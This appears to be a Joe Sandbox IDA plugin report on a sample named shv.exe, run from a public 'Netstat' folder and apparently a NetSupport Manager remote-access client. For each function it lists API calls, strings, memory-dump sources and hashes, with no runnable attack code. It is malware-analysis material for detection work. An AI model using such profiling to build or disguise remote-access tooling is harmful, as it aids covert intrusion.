Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391

Function 11144200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
ResetEvent.KERNEL32(00000258), ref: 11144269
SetEvent.KERNEL32(00000258), ref: 1114427F
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E

Strings

MiniDump, xrefs: 11144207

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1

Function 6D1C8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6D1C5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6D1C5014
Part of subcall function 6D1C5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6D1C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6D1C5034

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6D1C8EAE
FreeLibrary.KERNEL32(?), ref: 6D1C8EBF

Part of subcall function 6D1C2420: _strrchr.LIBCMT ref: 6D1C242E

Strings

NSM247Ctl.dll, xrefs: 6D1C8E7E
Set Is247=%d, xrefs: 6D1C8ED7
pcictl_247.dll, xrefs: 6D1C8E6C

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
API String ID: 3215810784-3459472706
Opcode ID: 65341f4b3f156b25bc9408cc5ddadc7f3656625d3510c5c162b985704b3e22ea
Instruction ID: 84b6d0ff3948fc53be61ec4b2f45d394d3170a049ca4cdbd80045f42dd60b00d
Opcode Fuzzy Hash: 65341f4b3f156b25bc9408cc5ddadc7f3656625d3510c5c162b985704b3e22ea
Instruction Fuzzy Hash: E4112671A441199BEB148B50DC85BFF7378AB2630AF014059EF08E3144EBB89944CB63

Function 1110F420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1110F439

Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96

wsprintfA.USER32 ref: 1110F454

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

_memset.LIBCMT ref: 1110F477

Strings

Can't alloc %u bytes, xrefs: 1110F44E
..\ctl32\Refcount.cpp, xrefs: 1110F465

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 3234921582-2664294811
Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9

Function 11145AE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76938400), ref: 111450D0
Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA

LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24

Strings

SetProcessDpiAwareness, xrefs: 11145B0B
shcore.dll, xrefs: 11145AFA

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
String ID: SetProcessDpiAwareness$shcore.dll
API String ID: 1108920153-1959555903
Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5

Function 11031870 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11031926

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

m_pDoInv == NULL, xrefs: 110318A3
%s%s.bin, xrefs: 11031920
301389, xrefs: 11031907
clientinv.cpp, xrefs: 1103189E

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
String ID: %s%s.bin$301389$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-2736919879
Opcode ID: 8c665bd7958abb01fa41c0eb9161827032ab5ea6725ba00c80f89516228d9cff
Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
Opcode Fuzzy Hash: 8c665bd7958abb01fa41c0eb9161827032ab5ea6725ba00c80f89516228d9cff
Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65

Function 11145910 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB

wsprintfA.USER32 ref: 1114593E
wsprintfA.USER32 ref: 11145954

Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76938400,?), ref: 111432C7
Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF

Strings

NSM.LIC, xrefs: 11145923
%sNSM.LIC, xrefs: 11145938
%sNSA.LIC, xrefs: 1114594E

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4

Function 11143230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76938400,?), ref: 111432C7
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
CloseHandle.KERNEL32(00000000), ref: 111432EF

Strings

", xrefs: 1114327E

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750

Function 1102D0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,461C6054,76232EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A

Strings

Client, xrefs: 1102D103
DisableGeolocation, xrefs: 1102D0FE

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 3315423714-4166767992
Opcode ID: 200e130d4cc0a5b84aba688065c8367ce8263274e01f9c4d602d3ddf573fc3e1
Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
Opcode Fuzzy Hash: 200e130d4cc0a5b84aba688065c8367ce8263274e01f9c4d602d3ddf573fc3e1
Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785

Function 110271B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA

Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,76933760,00000000,7694A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4

TranslateMessage.USER32(?), ref: 110271F0
DispatchMessageA.USER32(?), ref: 110271F6

Strings

Exit Msgloop, quit=%d, xrefs: 1102722D

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1

Function 110173F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110173FD

Part of subcall function 11017300: WaitForSingleObject.KERNEL32(00000328,000000FF), ref: 1101733C
Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0

Part of subcall function 11017220: WaitForSingleObject.KERNEL32(00000328,000000FF), ref: 11017252
Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0

SetEvent.KERNEL32(00000328), ref: 1101741D
GetTickCount.KERNEL32 ref: 11017423

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3804766296-4122679463
Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1

Function 6D1C4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6D1C4FC4
K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6D1C8E0D,00000000,?,6D1C8E0D,00000000,?,00000FA0,?), ref: 6D1C4FE4
SetLastError.KERNEL32(00000078,00000000,?,6D1C8E0D,00000000,?,00000FA0,?), ref: 6D1C4FED

Strings

EnumProcessModules, xrefs: 6D1C4FBE

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

